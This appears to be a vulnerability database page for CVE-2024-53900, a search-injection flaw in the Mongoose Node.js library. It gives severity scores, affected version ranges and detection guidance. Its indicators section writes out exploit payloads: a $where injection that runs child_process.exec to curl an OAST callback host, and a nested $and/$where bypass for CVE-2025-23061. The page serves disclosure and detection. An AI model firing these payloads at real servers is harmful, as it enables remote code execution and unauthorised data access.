cbcvebase.
CVE-2024-53900
published 2024-12-02

CVE-2024-53900: Mongoose before 8.8.3 can improperly use $where in match, leading to search injection.

PriorityP180critical9.1CVSS 3.1
AVNACLPRNUINSUCHIHAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
3.99%
89.2th percentile
Mongoose before 8.8.3 can improperly use $where in match, leading to search injection.

Affected

18 ranges
VendorProductVersion rangeFixed in
cesantamongoose>= 0 < 6.13.66.13.6
cesantamongoose>= 3.6.0-rc0 < 5.13.235.13.23
cesantamongoose>= 6.0.0-rc0 < 6.13.56.13.5
cesantamongoose>= 7.0.0-rc0 < 7.8.37.8.3
cesantamongoose>= 7.0.0-rc0 < 7.8.47.8.4
cesantamongoose>= 8.0.0-rc0 < 8.8.38.8.3
cesantamongoose>= 8.0.0-rc0 < 8.9.58.9.5
mongoosejsmongoose< 6.13.66.13.6
mongoosejsmongoose< 6.13.56.13.5
mongoosejsmongoose
mongoosejsmongoose
mongoosejsmongoose>= 6.0.0 < 6.13.66.13.6
mongoosejsmongoose>= 7.0.0 < 7.8.47.8.4
mongoosejsmongoose>= 7.0.0 < 7.8.47.8.4
mongoosejsmongoose>= 7.0.1 < 7.8.37.8.3
mongoosejsmongoose>= 8.0.0 < 8.9.58.9.5
mongoosejsmongoose>= 8.0.0 < 8.9.58.9.5
mongoosejsmongoose>= 8.0.1 < 8.8.38.8.3

Detection & IOCsextracted from sources · hover to see the quote

url{{BaseURL}}?view[path]=author&view[match][$where]=global.process.mainModule.constructor._load('child_process').exec('curl {{interactsh-url}}')
commandglobal.process.mainModule.constructor._load('child_process').exec('curl {{interactsh-url}}')
url{{BaseURL}}/posts?authorMatch={"$and":[{"$where":"this.isAdmin"}]}
otherview[match][$where]=
other{"$and":[{"$where":"this.isAdmin"}]}
  • Detect CVE-2024-53900 exploitation by monitoring HTTP GET requests containing '$where' within the 'match' query parameter, specifically the pattern 'view[match][$where]=' in request URLs targeting Mongoose-backed Node.js applications.
  • Detect CVE-2025-23061 bypass (incomplete fix for CVE-2024-53900) by monitoring for nested $where operators inside logical operators such as $and in query parameters, e.g. '$and':[{'$where':...}] in HTTP requests to populate()-backed endpoints.
  • Response-based detection: a successful exploit of the nested $where bypass returns a JSON body containing '"isAdmin":true' alongside '"title":' and '"username":' fields with HTTP 200 and Content-Type application/json.
  • Out-of-band detection: monitor for outbound curl HTTP callbacks to an interactsh/OAST collector originating from the MongoDB/Node.js server process, triggered by the injected child_process.exec payload.
  • Use Shodan query 'Server: Mongoose' or title:"Mongoose" to identify potentially exposed Mongoose-backed services for proactive scanning.
  • ·CVE-2024-53900 affects Mongoose versions before 8.8.3; the incomplete fix was bypassed in CVE-2025-23061, which requires Mongoose < 8.9.5. Detection rules should account for both version ranges.
  • ·The CVE-2025-23061 bypass works specifically because the patched code blocks direct top-level $where but does not recurse into nested logical operators ($and, $or, etc.); detection logic must inspect nested query structures, not just top-level keys.
  • ·The exploit path targets the populate() function's 'match' option; detection should be scoped to endpoints that accept user-controlled match/filter parameters passed to Mongoose populate(), not all MongoDB query endpoints.

CVSS provenance

nvdv3.19.1CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
ghsa9.1CRITICAL
osv9.1CRITICAL
vulncheck9.1CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.